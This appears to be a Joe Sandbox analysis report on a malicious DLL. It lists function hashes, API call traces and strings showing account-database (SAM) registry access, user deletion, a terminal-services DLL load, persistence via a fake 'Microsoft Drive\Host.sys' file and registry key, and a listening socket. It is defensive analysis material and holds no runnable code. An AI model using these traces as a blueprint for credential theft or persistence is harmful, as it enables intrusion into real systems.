                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Virtual$AllocAttributesCloseCreateFolderFreeHandlePathReadSizeSpecialfreemalloc
                                                          • String ID: Main
                                                          • API String ID: 2820283417-521822810
                                                          • Opcode ID: 13776bcad715608dff0506f2e30abc6ad8c9195b9db0b12638408b4caa4561db
                                                          • Instruction ID: bdf9819eaa4e7debe0beb33892044917b998e779a9669e77957c816ab1e879f9
                                                          • Opcode Fuzzy Hash: 13776bcad715608dff0506f2e30abc6ad8c9195b9db0b12638408b4caa4561db
                                                          • Instruction Fuzzy Hash: 1451E8756002005BE718DB388C99FAB3699FB84720F184739FE1ADB2D5DE79A904C764
                                                          APIs
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001A98A
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9C4
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9D4
                                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9E4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9EB
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001A9F8
                                                          • gethostname.WS2_32(?,?), ref: 1001AA00
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001AA07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Filelstrlen$#823$AddressCloseCreateHandleLibraryLoadProcReadSizegethostname
                                                          • String ID: C:\ProgramData\Microsoft Drive\Host.sys$Host$TGByte\Setup
                                                          • API String ID: 1105965372-3579490797
                                                          • Opcode ID: 26600dc6ced3552f7cb32c9401563bb8fc38f089117c6e8a29bd790fcd37870b
                                                          • Instruction ID: 1aca79b18ebe77987ab2057df5d6393e57785d9c54ea4be51680de8087f9014e
                                                          • Opcode Fuzzy Hash: 26600dc6ced3552f7cb32c9401563bb8fc38f089117c6e8a29bd790fcd37870b
                                                          • Instruction Fuzzy Hash: B331D675604754AFE320CB28CC90FEB7799FB89340F040929FA49A7290DA316945CF62
                                                          APIs
                                                          • wsprintfA.USER32 ref: 10026D35
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10026D4B
                                                          • lstrcatA.KERNEL32(?,?), ref: 10026D5E
                                                          • LocalAlloc.KERNEL32(00000040,00000400), ref: 10026D6B
                                                          • GetFileAttributesA.KERNEL32(?), ref: 10026D7B
                                                          • LoadLibraryA.KERNEL32(?), ref: 10026D8E
                                                          • lstrlenA.KERNEL32(?,?,?,771B0F00), ref: 10026DA9
                                                          • lstrlenA.KERNEL32(?,?,771B0F00), ref: 10026DC9
                                                          • LocalReAlloc.KERNEL32(00000000,00000003,00000042,?,771B0F00), ref: 10026DD3
                                                          • LocalFree.KERNEL32(00000000,?,771B0F00), ref: 10026DE7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$Alloclstrlen$AttributesDirectoryFileFreeLibraryLoadSystemlstrcatwsprintf
                                                          • String ID: \termsrv_t.dll
                                                          • API String ID: 2807520882-1337493607
                                                          • Opcode ID: c29be6d71f4e1c5f9d6bfc8c749e4c27b7b64770f87dbed75690b64cd3501d5c
                                                          • Instruction ID: 65923665598b0d5bc9376def11d9c452954a14e2149ef0656fb128811b96f142
                                                          • Opcode Fuzzy Hash: c29be6d71f4e1c5f9d6bfc8c749e4c27b7b64770f87dbed75690b64cd3501d5c
                                                          • Instruction Fuzzy Hash: 3B21D176100306AFD724DB60DC88EEB77A8FB85310F448E18FA4A97191EB70E509CB62
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: inet_ntoa$htons$inet_addr
                                                          • String ID:
                                                          • API String ID: 2325850693-0
                                                          • Opcode ID: feff4991006adee928c6db238b0ff46cf5f451b3ea962ecf4bc5810bc883adaf
                                                          • Instruction ID: 0f8a403a37a04198fb3543f642c4371480fab305af7d543d8c9d6285c61f0e9b
                                                          • Opcode Fuzzy Hash: feff4991006adee928c6db238b0ff46cf5f451b3ea962ecf4bc5810bc883adaf
                                                          • Instruction Fuzzy Hash: 6051493A7046544BCB18DF38B8901AFB7D1FF89260B9985AEFD8AD7341CA21ED01C764
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BA5E
                                                          • Process32First.KERNEL32(00000000,?), ref: 1000BA73
                                                          • GetLastError.KERNEL32(00000000,?), ref: 1000BA80
                                                          • _wcsupr.MSVCRT ref: 1000BA9D
                                                          • _wcsupr.MSVCRT ref: 1000BAA6
                                                          • wcsstr.MSVCRT ref: 1000BAAA
                                                          • Process32Next.KERNEL32(00000000,?), ref: 1000BACD
                                                          • _strlwr.MSVCRT ref: 1000BAE7
                                                          • _strlwr.MSVCRT ref: 1000BAEA
                                                          • strstr.MSVCRT ref: 1000BAF2
                                                          • Process32Next.KERNEL32(00000000,?), ref: 1000BB01
                                                          • CloseHandle.KERNEL32(00000000,00000000,?), ref: 1000BB0B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process32$Next_strlwr_wcsupr$CloseCreateErrorFirstHandleLastSnapshotToolhelp32strstrwcsstr
                                                          • String ID:
                                                          • API String ID: 146143966-0
                                                          • Opcode ID: 479f2f72a704a3b5c2289d2de251190d7c82cc186dc092ac8778594daa37f946
                                                          • Instruction ID: 58f6ba2257750e6ab45c168541484ccfaec70cf465e469f9539c8ec9d4fa11c7
                                                          • Opcode Fuzzy Hash: 479f2f72a704a3b5c2289d2de251190d7c82cc186dc092ac8778594daa37f946
                                                          • Instruction Fuzzy Hash: 6D11B6762003156BF350EBB59C85EEB7B9CEFC1390F850929FD05C2145EB39E90886B1
                                                          APIs
                                                          • NetUserDel.NETAPI32(00000000,00000000), ref: 10025C48
                                                          • #825.MFC42(00000000,00000000,00000000), ref: 10025C50
                                                          • wsprintfA.USER32 ref: 10025C98
                                                          • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 10025CB8
                                                          • Sleep.KERNEL32(00000032), ref: 10025CC4
                                                          • RegQueryValueExA.ADVAPI32 ref: 10025CF1
                                                          • RegCloseKey.ADVAPI32(1012B044), ref: 10025CFC
                                                          • wsprintfA.USER32 ref: 10025D11
                                                            • Part of subcall function 10025700: LocalSize.KERNEL32(00000000), ref: 10025710
                                                            • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Localwsprintf$#825CloseFreeOpenQuerySizeSleepUserValue
                                                          • String ID: %08X$SAM\SAM\Domains\Account\Users\Names\%s
                                                          • API String ID: 2119749478-1111274145
                                                          • Opcode ID: b01912df1a0d1f8e6f5d4f2d64c2b0e34237368b2916a4d310cc0862af80d056
                                                          • Instruction ID: 7d074f82118bbd200c174c2c7089e418c148b78a36223b64fb6bb0d76c55cb0a
                                                          • Opcode Fuzzy Hash: b01912df1a0d1f8e6f5d4f2d64c2b0e34237368b2916a4d310cc0862af80d056
                                                          • Instruction Fuzzy Hash: 9931F8752043056FE210DB24EC85FAB77ECEBC5255F80092DF94692282EA76ED0C8767
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B634
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000B6A9
                                                          • GetFileSize.KERNEL32 ref: 1000B6BC
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 1000B6D0
                                                          • lstrlenA.KERNEL32(?), ref: 1000B6DE
                                                          • #823.MFC42(00000000), ref: 1000B6E7
                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1000B70D
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 1000B716
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000B71D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$lstrlen$#823CloseCreateDirectoryHandlePointerSizeSystemWrite
                                                          • String ID: .key
                                                          • API String ID: 2856261289-343438762
                                                          • Opcode ID: 3818ea17cc2e59f9f6ab64f97ab2d81d5e532922a39f58c257a4f2331ab7a23d
                                                          • Instruction ID: bd8e3325d0db8e7463eafbc11f0d66b84d6b493b70728e4679981c1757bf8fad
                                                          • Opcode Fuzzy Hash: 3818ea17cc2e59f9f6ab64f97ab2d81d5e532922a39f58c257a4f2331ab7a23d
                                                          • Instruction Fuzzy Hash: A0215C752006042BF724DA789C8AFAB3A89FB84760F580739FE57D71D1DEA49D088760
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutOpen), ref: 100014C9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100014D2
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutPrepareHeader), ref: 100014E2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100014E5
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutGetNumDevs), ref: 100014F5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100014F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: WINMM.dll$waveOutGetNumDevs$waveOutOpen$waveOutPrepareHeader
                                                          • API String ID: 2574300362-4065288365
                                                          • Opcode ID: c1eceda1addd48c4943001bcefb37505a5823e870f1f8cdf6cdf7baea139bf02
                                                          • Instruction ID: 97c40741ceac41b55f427a3e19617a04594bb35f0b993fe0b131869bec9d13a6
                                                          • Opcode Fuzzy Hash: c1eceda1addd48c4943001bcefb37505a5823e870f1f8cdf6cdf7baea139bf02
                                                          • Instruction Fuzzy Hash: C5212676600204ABDB10DF68EC84AA67BE8FFC8310F154469EB049B301D736E945DBE0
                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000E5EA
                                                          • lstrlenA.KERNEL32 ref: 1000E609
                                                          • WriteFile.KERNEL32(00000000,?,00000000), ref: 1000E612
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000E619
                                                          • RegCreateKeyA.ADVAPI32(80000001,TGByte\Setup,?), ref: 1000E62E
                                                          • RegSetValueExA.ADVAPI32(00000000,Host,00000000,00000001,?), ref: 1000E650
                                                          • RegCloseKey.ADVAPI32(?), ref: 1000E65B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateFile$HandleValueWritelstrlen
                                                          • String ID: C:\ProgramData\Microsoft Drive\Host.sys$Host$TGByte\Setup
                                                          • API String ID: 1763583472-3579490797
                                                          • Opcode ID: 3c72f0055c499f351d9c69bb76d358f610eb38518ca91f6f01103dca83156795
                                                          • Instruction ID: 77af767004de95c6ec99707751be97fa26c4c007db1504f7e5df3f5080d650d4
                                                          • Opcode Fuzzy Hash: 3c72f0055c499f351d9c69bb76d358f610eb38518ca91f6f01103dca83156795
                                                          • Instruction Fuzzy Hash: 9E11A375100310BBE320DB68CC49FEB7BADFB89751F044A18F659A21D0DBB4A8058BA2
                                                          APIs
                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 10023D9A
                                                          • _errno.MSVCRT ref: 10023DA4
                                                          • __WSAFDIsSet.WS2_32(?,?), ref: 10023DBC
                                                          • __WSAFDIsSet.WS2_32(?,?), ref: 10023DD2
                                                          • recvfrom.WS2_32(00000010,?,00001FF6,00000000,?,00000010), ref: 10023E0C
                                                          • inet_addr.WS2_32(00000000), ref: 10023E8D
                                                          • htons.WS2_32(?), ref: 10023E9C
                                                          • Sleep.KERNEL32(00000005), ref: 10023ECC
                                                          • Sleep.KERNEL32(00000005,?,?), ref: 10023F37
                                                          • closesocket.WS2_32 ref: 10023F4C
                                                          • closesocket.WS2_32(?), ref: 10023F52
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleepclosesocket$_errnohtonsinet_addrrecvfromselect
                                                          • String ID:
                                                          • API String ID: 1415794423-0
                                                          • Opcode ID: 6df6ff11d769b684a62b0966e0b602471fdf7786851801ab43aab968e0e1c4fd
                                                          • Instruction ID: 526c464df8ce17cb72c57ff37cbb3dc0b2e5127f8a28d9ed385b909f9f69fec1
                                                          • Opcode Fuzzy Hash: 6df6ff11d769b684a62b0966e0b602471fdf7786851801ab43aab968e0e1c4fd
                                                          • Instruction Fuzzy Hash: F461A074508381ABD710CF24EC44AABB7F4FFC4714F408A2EF99997250E774D9098B66
                                                          APIs
                                                          • strchr.MSVCRT ref: 10023B29
                                                          • atoi.MSVCRT(?), ref: 10023B56
                                                          • strchr.MSVCRT ref: 10023B98
                                                          • strncpy.MSVCRT ref: 10023BCF
                                                          • strchr.MSVCRT ref: 10023BDB
                                                          • strncpy.MSVCRT ref: 10023C03
                                                          • strncpy.MSVCRT ref: 10023C1F
                                                          • InitializeCriticalSection.KERNEL32(1012C4E8), ref: 10023C86
                                                            • Part of subcall function 10023A10: WSAStartup.WS2_32(00000202,?), ref: 10023A21
                                                            • Part of subcall function 10023A10: socket.WS2_32(00000002,00000001,00000006), ref: 10023A35
                                                            • Part of subcall function 10023A10: htons.WS2_32 ref: 10023A68
                                                            • Part of subcall function 10023A10: bind.WS2_32 ref: 10023A83
                                                            • Part of subcall function 10023A10: listen.WS2_32(00000000,00000032), ref: 10023A94
                                                          • WSACleanup.WS2_32 ref: 10023C91
                                                          • DeleteCriticalSection.KERNEL32(1012C4E8), ref: 10023C9C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: strchrstrncpy$CriticalSection$CleanupDeleteInitializeStartupatoibindhtonslistensocket
                                                          • String ID:
                                                          • API String ID: 2616448033-0
                                                          • Opcode ID: c1a92cea721e5ccf23c547a041e3012d1e5b2b7bb08ce381eb8394f58684be4a
                                                          • Instruction ID: f97e8e17b2a768c3703299967ac859346c69456c2f5632f748529884bcaa4716
                                                          • Opcode Fuzzy Hash: c1a92cea721e5ccf23c547a041e3012d1e5b2b7bb08ce381eb8394f58684be4a
                                                          • Instruction Fuzzy Hash: 4941C0366046081BD32C96789C558FF7BD5FBC4320F554B2EFA2B936D0DEB4DA088694
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                                          • String ID:
                                                          • API String ID: 3289936468-0
                                                          • Opcode ID: 0dd721cf81c20e6a7698efb1a4a3b03771bafae10b7b11cfc38245ae795d8177
                                                          • Instruction ID: c614f76b29358a3fda3e897671393add0d389b4ba00e88ce342a7451a82b3d62
                                                          • Opcode Fuzzy Hash: 0dd721cf81c20e6a7698efb1a4a3b03771bafae10b7b11cfc38245ae795d8177
                                                          • Instruction Fuzzy Hash: 8241E8B4D046559FF721CF188C447AEBBE4FB0A6E0F14066AE8D5A3645C3344A02CFA6
                                                          APIs
                                                          • #540.MFC42 ref: 10011358
                                                          • #858.MFC42(00000004), ref: 10011376
                                                          • #922.MFC42(?,00000000,00000000,?,?,?,?), ref: 100113A9
                                                          • #858.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113B8
                                                          • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113C6
                                                          • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113D4
                                                          • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113E1
                                                          • #939.MFC42(00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?), ref: 10011409
                                                          • #800.MFC42(00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?), ref: 10011416
                                                          • #535.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 10011426
                                                          • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 10011438
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
